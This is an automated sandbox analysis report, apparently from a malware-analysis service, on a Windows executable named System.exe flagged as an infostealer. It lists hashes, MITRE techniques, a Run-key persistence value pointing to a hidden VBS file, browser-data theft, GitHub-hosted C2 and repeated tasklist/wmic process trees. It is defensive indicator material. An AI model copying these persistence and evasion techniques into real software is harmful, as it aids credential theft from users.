af277117f93fbe518b20b27504d9607df8389027daa848178dcf24355b33bd82

Resubmissions

15/03/2024, 17:57

240315-wjxylafa5y 8

Analysis

max time kernel
150s
max time network
154s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
15/03/2024, 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.exe
Size

158.3MB
MD5

2fc619804ddd0e6a29f768292822d6d6
SHA1

d43152e0c3f040a59a07d1b494d80361d904d7c9
SHA256

994eaeba18456e8337729eb62403048c69289af5c0c5a01e129ab088c39765d0
SHA512

c6705b4bc2a2dd233fc564694a87811a4e9e58eccef0000ef2598f90fa62149a29232d64819af4c406557d358bd3c2b2f4d9458245593d7a920301688638daff
SSDEEP

1572864:UatFKZwMtLYWQwZOTACYItd+qy9YN6yxL+a6ZqbZX5OG+hJfROyOe/FkCX3cIwvI:viQ08xye4

Score

8^/10

evasion persistence spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Loads dropped DLL 2 IoCs

pid	Process
4536	System.exe
4536	System.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_UOUIF5 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_UOUIF5.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
42	raw.githubusercontent.com
49	raw.githubusercontent.com
51	raw.githubusercontent.com
52	raw.githubusercontent.com
29	raw.githubusercontent.com
38	raw.githubusercontent.com
40	raw.githubusercontent.com
41	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ipinfo.io
24	ipinfo.io

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	System.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
11024	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
7732	tasklist.exe
8220	tasklist.exe
8196	tasklist.exe
8000	tasklist.exe
7516	tasklist.exe
8560	tasklist.exe
7852	tasklist.exe
7752	tasklist.exe
8184	tasklist.exe
7528	tasklist.exe
7720	tasklist.exe
8252	tasklist.exe
8236	tasklist.exe
8204	tasklist.exe
8056	tasklist.exe
7960	tasklist.exe
7588	tasklist.exe
7484	tasklist.exe
8260	tasklist.exe
8348	tasklist.exe
8508	tasklist.exe
7860	tasklist.exe
7764	tasklist.exe
7544	tasklist.exe
8092	tasklist.exe
7844	tasklist.exe
8492	tasklist.exe
7348	tasklist.exe
8448	tasklist.exe
8356	tasklist.exe
8176	tasklist.exe
8168	tasklist.exe
7944	tasklist.exe
5968	tasklist.exe
7740	tasklist.exe
7976	tasklist.exe
8500	tasklist.exe
8040	tasklist.exe
7600	tasklist.exe
7608	tasklist.exe
8372	tasklist.exe
8048	tasklist.exe
8552	tasklist.exe
7936	tasklist.exe
8860	tasklist.exe
7568	tasklist.exe
7676	tasklist.exe
8396	tasklist.exe
7884	tasklist.exe
7808	tasklist.exe
7436	tasklist.exe
7712	tasklist.exe
7772	tasklist.exe
8516	tasklist.exe
8544	tasklist.exe
8032	tasklist.exe
7644	tasklist.exe
7552	tasklist.exe
7472	tasklist.exe
8084	tasklist.exe
8380	tasklist.exe
8076	tasklist.exe
8068	tasklist.exe
8964	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4536	System.exe
4536	System.exe
4536	System.exe
4536	System.exe
4536	System.exe
4536	System.exe
11116	powershell.exe
11116	powershell.exe
11116	powershell.exe
9000	powershell.exe
9000	powershell.exe
9000	powershell.exe
5800	powershell.exe
5800	powershell.exe
8524	powershell.exe
8524	powershell.exe
6952	powershell.exe
6952	powershell.exe
6952	powershell.exe
5800	powershell.exe
8524	powershell.exe
6576	powershell.exe
6576	powershell.exe
6576	powershell.exe
2056	powershell.exe
2056	powershell.exe
2056	powershell.exe
8144	powershell.exe
8144	powershell.exe
8144	powershell.exe
8592	powershell.exe
8592	powershell.exe
8592	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
7568	powershell.exe
7568	powershell.exe
7568	powershell.exe
10212	powershell.exe
10212	powershell.exe
10212	powershell.exe
8096	powershell.exe
8096	powershell.exe
8096	powershell.exe
7580	powershell.exe
7580	powershell.exe
7580	powershell.exe
7332	System.exe
7332	System.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4364	WMIC.exe
Token: SeSecurityPrivilege	4364	WMIC.exe
Token: SeTakeOwnershipPrivilege	4364	WMIC.exe
Token: SeLoadDriverPrivilege	4364	WMIC.exe
Token: SeSystemProfilePrivilege	4364	WMIC.exe
Token: SeSystemtimePrivilege	4364	WMIC.exe
Token: SeProfSingleProcessPrivilege	4364	WMIC.exe
Token: SeIncBasePriorityPrivilege	4364	WMIC.exe
Token: SeCreatePagefilePrivilege	4364	WMIC.exe
Token: SeBackupPrivilege	4364	WMIC.exe
Token: SeRestorePrivilege	4364	WMIC.exe
Token: SeShutdownPrivilege	4364	WMIC.exe
Token: SeDebugPrivilege	4364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4364	WMIC.exe
Token: SeRemoteShutdownPrivilege	4364	WMIC.exe
Token: SeUndockPrivilege	4364	WMIC.exe
Token: SeManageVolumePrivilege	4364	WMIC.exe
Token: 33	4364	WMIC.exe
Token: 34	4364	WMIC.exe
Token: 35	4364	WMIC.exe
Token: 36	4364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4364	WMIC.exe
Token: SeSecurityPrivilege	4364	WMIC.exe
Token: SeTakeOwnershipPrivilege	4364	WMIC.exe
Token: SeLoadDriverPrivilege	4364	WMIC.exe
Token: SeSystemProfilePrivilege	4364	WMIC.exe
Token: SeSystemtimePrivilege	4364	WMIC.exe
Token: SeProfSingleProcessPrivilege	4364	WMIC.exe
Token: SeIncBasePriorityPrivilege	4364	WMIC.exe
Token: SeCreatePagefilePrivilege	4364	WMIC.exe
Token: SeBackupPrivilege	4364	WMIC.exe
Token: SeRestorePrivilege	4364	WMIC.exe
Token: SeShutdownPrivilege	4364	WMIC.exe
Token: SeDebugPrivilege	4364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4364	WMIC.exe
Token: SeRemoteShutdownPrivilege	4364	WMIC.exe
Token: SeUndockPrivilege	4364	WMIC.exe
Token: SeManageVolumePrivilege	4364	WMIC.exe
Token: 33	4364	WMIC.exe
Token: 34	4364	WMIC.exe
Token: 35	4364	WMIC.exe
Token: 36	4364	WMIC.exe
Token: SeShutdownPrivilege	4536	System.exe
Token: SeCreatePagefilePrivilege	4536	System.exe
Token: SeDebugPrivilege	7076	tasklist.exe
Token: SeDebugPrivilege	5968	tasklist.exe
Token: SeDebugPrivilege	7436	tasklist.exe
Token: SeDebugPrivilege	7472	tasklist.exe
Token: SeDebugPrivilege	7508	tasklist.exe
Token: SeDebugPrivilege	7484	tasklist.exe
Token: SeDebugPrivilege	7348	tasklist.exe
Token: SeShutdownPrivilege	4536	System.exe
Token: SeCreatePagefilePrivilege	4536	System.exe
Token: SeDebugPrivilege	7568	tasklist.exe
Token: SeDebugPrivilege	7448	tasklist.exe
Token: SeDebugPrivilege	7600	tasklist.exe
Token: SeDebugPrivilege	7456	tasklist.exe
Token: SeDebugPrivilege	7528	tasklist.exe
Token: SeDebugPrivilege	7616	tasklist.exe
Token: SeDebugPrivilege	7464	tasklist.exe
Token: SeDebugPrivilege	7552	tasklist.exe
Token: SeDebugPrivilege	7560	tasklist.exe
Token: SeDebugPrivilege	7536	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4536 wrote to memory of 1964	4536	System.exe	80
PID 4536 wrote to memory of 1964	4536	System.exe	80
PID 1964 wrote to memory of 1436	1964	cmd.exe	82
PID 1964 wrote to memory of 1436	1964	cmd.exe	82
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 3732	4536	System.exe	83
PID 4536 wrote to memory of 4940	4536	System.exe	84
PID 4536 wrote to memory of 4940	4536	System.exe	84
PID 4536 wrote to memory of 728	4536	System.exe	86
PID 4536 wrote to memory of 728	4536	System.exe	86
PID 728 wrote to memory of 4364	728	cmd.exe	88
PID 728 wrote to memory of 4364	728	cmd.exe	88
PID 4536 wrote to memory of 4704	4536	System.exe	89
PID 4536 wrote to memory of 4704	4536	System.exe	89
PID 4536 wrote to memory of 1940	4536	System.exe	90
PID 4536 wrote to memory of 1940	4536	System.exe	90
PID 4536 wrote to memory of 1960	4536	System.exe	92
PID 4536 wrote to memory of 1960	4536	System.exe	92
PID 4536 wrote to memory of 1452	4536	System.exe	93
PID 4536 wrote to memory of 1452	4536	System.exe	93
PID 4536 wrote to memory of 908	4536	System.exe	94
PID 4536 wrote to memory of 908	4536	System.exe	94
PID 4536 wrote to memory of 3996	4536	System.exe	96
PID 4536 wrote to memory of 3996	4536	System.exe	96
PID 4536 wrote to memory of 1480	4536	System.exe	97
PID 4536 wrote to memory of 1480	4536	System.exe	97
PID 4536 wrote to memory of 2044	4536	System.exe	99
PID 4536 wrote to memory of 2044	4536	System.exe	99
PID 4536 wrote to memory of 3384	4536	System.exe	101
PID 4536 wrote to memory of 3384	4536	System.exe	101
PID 4536 wrote to memory of 2780	4536	System.exe	103
PID 4536 wrote to memory of 2780	4536	System.exe	103
PID 4536 wrote to memory of 1224	4536	System.exe	104
PID 4536 wrote to memory of 1224	4536	System.exe	104
PID 4536 wrote to memory of 2220	4536	System.exe	105
PID 4536 wrote to memory of 2220	4536	System.exe	105

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
7960	attrib.exe

C:\Users\Admin\AppData\Local\Temp\System.exe
"C:\Users\Admin\AppData\Local\Temp\System.exe"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1672 --field-trial-handle=1676,i,6424519353352575281,12786802167521524184,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:3732
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --mojo-platform-channel-handle=1732 --field-trial-handle=1676,i,6424519353352575281,12786802167521524184,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4704
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1940
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1960
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1452
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:908
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3996
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1480
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2044
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3384
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2780
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1224
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2220
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3936
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3684
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:436
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4908
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1800
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2660
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2916
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:5968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2544
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2488
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4608
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2372
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1116
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2688
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:876
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3116
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1632
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1484
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1056
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2528
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4584
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3168
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4296
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:772
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2344
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2784
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1748
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:996
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2492
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4804
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4500
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4300
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4792
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4868
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4012
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3108
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3340
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:840
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4112
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2940
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3708
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1380
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3364
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1852
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4324
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4768
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1540
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3264
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4724
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
